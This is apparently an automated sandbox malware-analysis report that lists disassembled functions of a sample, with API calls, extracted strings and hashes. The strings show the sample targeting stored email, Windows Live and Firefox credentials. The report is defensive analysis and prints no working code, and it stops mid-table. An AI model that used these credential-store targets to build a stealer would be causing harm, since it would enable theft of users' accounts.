                                                            • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                            • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                            • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                            • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                            Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                            • strchr.MSVCRT ref: 0040327B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringstrchr
                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                            • API String ID: 1348940319-1729847305
                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                            Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                            • API String ID: 3510742995-3273207271
                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                            Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 00405E80
                                                            • GetWindow.USER32(?,00000005), ref: 00405E98
                                                            • GetWindow.USER32(00000000), ref: 00405E9B
                                                              • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                              • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                            • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                            • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                            • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                            • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                            • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                            • SetFocus.USER32(00000000), ref: 00405EF3
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$Rect$ClientFocusPoints
                                                            • String ID:
                                                            • API String ID: 2432066023-0
                                                            • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                            • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                            • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                            • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                            Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                            • memset.MSVCRT ref: 0040FA1E
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                            • _strnicmp.MSVCRT ref: 0040FA4F
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                            • String ID: WindowsLive:name=*$windowslive:name=
                                                            • API String ID: 945165440-3589380929
                                                            • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                            • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                            • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                            • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                            Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                              • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                              • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                              • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                            • strchr.MSVCRT ref: 0040371F
                                                            • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                            • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                            • strlen.MSVCRT ref: 00403778
                                                            • sprintf.MSVCRT ref: 0040379C
                                                            • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                            • String ID: %s@gmail.com
                                                            • API String ID: 3261640601-4097000612
                                                            • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                            • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                            • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                            • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                            Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004094C8
                                                            • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                            • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                            • memset.MSVCRT ref: 0040950C
                                                            • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                            • _strcmpi.MSVCRT ref: 00409531
                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                            • String ID: sysdatetimepick32
                                                            • API String ID: 3411445237-4169760276
                                                            • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                            • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                            • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                            • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                            Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                            • EndDialog.USER32(?,00000002), ref: 00405A96
                                                            • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                              • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                              • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                              • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                            • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$DialogMessageSend
                                                            • String ID:
                                                            • API String ID: 2485852401-0
                                                            • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                            • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                            • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                            • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                            Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                            • String ID:
                                                            • API String ID: 3642520215-0
                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                            Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                            • memset.MSVCRT ref: 00405C3B
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                            • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                            • String ID:
                                                            • API String ID: 2313361498-0
                                                            • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                            • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                            • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                            • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                            Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 0040BB33
                                                            • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                            • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                            • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                            • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Defer$Rect$BeginClient
                                                            • String ID:
                                                            • API String ID: 2126104762-0
                                                            • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                            • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                            • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                            • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                            Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                            • String ID:
                                                            • API String ID: 1999381814-0
                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                            Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                            • API String ID: 1297977491-3883738016
                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                            Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                              • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                              • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                              • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                              • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                            • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: gj
                                                            • API String ID: 438689982-4203073231
                                                            • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                            • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                            • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                            • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                            Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040DAE3
                                                            • memset.MSVCRT ref: 0040DAF7
                                                            • memset.MSVCRT ref: 0040DB0B
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset$strlen$_memicmp
                                                            • String ID: user_pref("
                                                            • API String ID: 765841271-2487180061
                                                            • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                            • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                            • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                            • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                            Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                            • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                            • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                            • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                            • memset.MSVCRT ref: 004058C3
                                                            • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                            • SetFocus.USER32(?), ref: 00405976
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$FocusItemmemset
                                                            • String ID:
                                                            • API String ID: 4281309102-0
                                                            • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                            • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                            • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                            • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                            Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            • _mbscat.MSVCRT ref: 0040A8FF
                                                            • sprintf.MSVCRT ref: 0040A921
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite_mbscatsprintfstrlen
                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
